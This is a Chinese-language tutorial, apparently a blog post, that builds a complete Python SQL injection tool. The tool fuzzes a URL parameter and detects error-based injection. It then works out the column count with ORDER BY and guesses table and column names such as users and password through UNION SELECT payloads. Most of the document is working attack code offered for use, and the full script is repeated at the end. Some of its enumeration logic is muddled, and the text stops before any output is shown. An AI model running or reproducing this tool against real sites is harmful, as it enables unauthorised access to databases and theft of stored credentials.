工具參數獲取
- 工具思路
- 驗證sql注入是否存在
- 基於錯誤base_error
- You have an error in SQL syntax;
- 獲取測試url,對指定參數進行模糊測試FUZZ
- 工具參數設置
- 測試url -u
- 測試FUZZ文件 -i
參數獲取代碼編寫
parser = optparse.OptionParser()
parser.usage="sqlinjector.py -u url -i inject_fuzz.txt"
parser.add_option("-u",'--url',dest='url',help='url to test sql',action='store',type='string',metavar='URL')
parser.add_option('-i','--inject',dest='inject_file',help="fuzz fliename",action='store',type='string',metavar='FUZZFILE')
(options,args) = parser.parse_args()
url = options.url
fuzz_file = options.inject_file
Sql注入測試
- 原理
根據是否具有特定字符, you have an error in your SQL syntax實現
發送請求對每一個url進行拼接, 得到響應字符串,查看是否具有SQL syntax
def get_urls():
urls = []
with open(fuzz_file,'r')as f:
payload_list = f.readlines() #每一項之後都有一個\n需要使用strip()去除
for payload in payload_list:
temp_url = url #生成一個新的url,避免拼接內容後就
payload = payload.strip()
urls.append(temp_url.replace("FUZZ",payload)) #replace拼接內容,將前者替換爲後者
return urls
inject_urls = get_urls()
result_list = [] # 存儲sql注入驗證成功的url列表
is_injectable = []
def test_sql():
print("testing url:")
for item in inject_urls:
r = requests.get(url=item)
print(r.url)
result = r.text
if result.find("SQL syntax") != -1: #判斷返回結果是否存在SQL syntax
is_injectable.append(True)
result_list.append(r.url)
test_sql()
if len(result_list) == 0:
print("no sql inject")
else:
print("*"*50)
print("exist sql inject")
for item in result_list:
print(item)
print("*"*50)
探測表字段數
- 利用sql注入
- 獲取當前注入點,對應數據表的字段數
- 定義
- def delect_columns_num():
- 探測當前字段數/列數
def detect_column_num():
i = 1
while i < 100:
i += 1
temp_url = url.replace("FUZZ","1' order by " + str(i) + "--+")
r = requests.get(temp_url)
print(r.url)
if r.text.find("Unknow") == -1:
continue
else:
break
return i-1
if len(is_injectable) > 0:
column = detect_column_num()
print("Find this table has "+str(column) + " " + "column")
探測表名
- 原理
- 注入點報錯,聯合查詢,枚舉表名
- -1’union+select+1,2,3+from+users±-+
- 實現
- 定義detect_table_name():
table_result = []
def detect_table_name():
u = ""
for i in range(column): #從0開始循環到column最大值
u = u + str(i+1)+"," #第一次i是0所以+1
u = u[0:len(u)-1]
table_list = ["admin","admin123","root","administrator","users","emails","referers","uagents"]
key = "doesn't exist" #不存在注入點時的報錯信息,用以判斷正確的
for table_name in table_list:
temp_url = url.replace("FUZZ","-1'+union+select+" + u + "+from+"+ table_name+"--+")
r = requests.get(temp_url)
if r.text.find(key) == -1: #沒有找到
table_result.append(table_name)
if len(is_injectable) > 0 :
detect_table_name()
print('*'*50)
print("Find this table_name in DB:")
for table in table_result:
print(table)
探測列名
- 原理
使用聯合查詢,查詢指定列名 ‘-1+union+select+1,2,3+from+表名+--+,
1,2,3替換爲對應的列名
- 實現
- 定義def detect_column_name():
column_result = [] #用於存儲列名總值
def detect_column_name():
key = "Unknown column"
u = "" #獲取字段
for i in range(column): # 從0開始循環到column最大值
u = u + str(i + 1) + "," # 第一次i是0所以+1
u = u[0:len(u) - 1]
column_content = ["id", "user", "admin", "username", "password", "users"]
for table in table_result:
for line in column_content:
temp_url = url.replace("FUZZ","-1'+union+select+"+ u.replace("1",line) +"+from+"+table+"+--+")
r = requests.get(temp_url)
if r.text.find(key) == -1:
column_result.append(line)#未找到則追加列名
else:
column_result.append(table) #[column,table]反之追加表名
if len(is_injectable) > 0:
detect_column_name()
print("*"*50)
print("Find these column name:")
for line in column_result:
if line not in table_result:
print(line)
else:
print("上邊內容就是%s表對應的字段名: "%line)
完整代碼
import optparse
import requests
parser = optparse.OptionParser()
parser.usage="sqlinjector.py -u url -i inject_fuzz.txt"
parser.add_option("-u",'--url',dest='url',help='url to test sql',action='store',type='string',metavar='URL')
parser.add_option('-i','--inject',dest='inject_file',help="fuzz fliename",action='store',type='string',metavar='FUZZFILE')
(options,args) = parser.parse_args()
url = options.url
fuzz_file = options.inject_file
def get_urls():
urls = []
with open(fuzz_file,'r')as f:
payload_list = f.readlines() #每一項之後都有一個\n需要使用strip()去除
for payload in payload_list:
temp_url = url #生成一個新的url,避免拼接內容後就
payload = payload.strip()
urls.append(temp_url.replace("FUZZ",payload)) #replace拼接內容,將前者替換爲後者
return urls
inject_urls = get_urls()
result_list = [] # 存儲sql注入驗證成功的url列表
is_injectable = []
def test_sql():
print("testing url:")
for item in inject_urls:
r = requests.get(url=item)
print(r.url)
result = r.text
if result.find("SQL syntax") != -1: #判斷返回結果是否存在SQL syntax
is_injectable.append(True)
result_list.append(r.url)
test_sql()
if len(result_list) == 0:
print("no sql inject")
else:
print("*"*50)
print("exist sql inject")
for item in result_list:
print(item)
print("*"*50)
#功能實現,發現注入點對應的數據表擁有的字段數,列表
def detect_column_num():
i = 1
while i < 100:
i += 1
temp_url = url.replace("FUZZ","1' order by " + str(i) + "--+")
r = requests.get(temp_url)
print(r.url)
if r.text.find("Unknow") == -1:
continue
else:
break
return i-1
if len(is_injectable) > 0:
column = detect_column_num()
print("Find this table has "+str(column) + " " + "column")
table_result = []
def detect_table_name():
u = ""
for i in range(column): #從0開始循環到column最大值
u = u + str(i+1)+"," #第一次i是0所以+1
u = u[0:len(u)-1]
table_list = ["admin","admin123","root","administrator","users","emails","referers","uagents"]
key = "doesn't exist"
for table_name in table_list:
temp_url = url.replace("FUZZ","-1'+union+select+" + u + "+from+"+ table_name+"--+")
r = requests.get(temp_url)
if r.text.find(key) == -1: #沒有找到,則追加表名
table_result.append(table_name)
if len(is_injectable) > 0 :
detect_table_name()
print('*'*50)
print("Find this table_name in DB:")
for table in table_result:
print(table)
column_result = []
def detect_column_name():
key = "Unknown column"
u = "" #獲取字段
for i in range(column): # 從0開始循環到column最大值
u = u + str(i + 1) + "," # 第一次i是0所以+1
u = u[0:len(u) - 1]
column_content = ["id", "user", "admin", "username", "password", "users"]
for table in table_result:
for line in column_content:
temp_url = url.replace("FUZZ","-1'+union+select+"+ u.replace("1",line) +"+from+"+table+"+--+")
r = requests.get(temp_url)
if r.text.find(key) == -1: #未找到則追加列名
column_result.append(line)
else:
column_result.append(table) #[column,table]反之追加表名
if len(is_injectable) > 0:
detect_column_name()
print("*"*50)
print("Find these column name:")
for line in column_result:
if line not in table_result: #判斷列名是否不存在列名列名列表中
print(line)
else:
print("上邊內容就是%s表對應的字段名: "%line)
運行效果: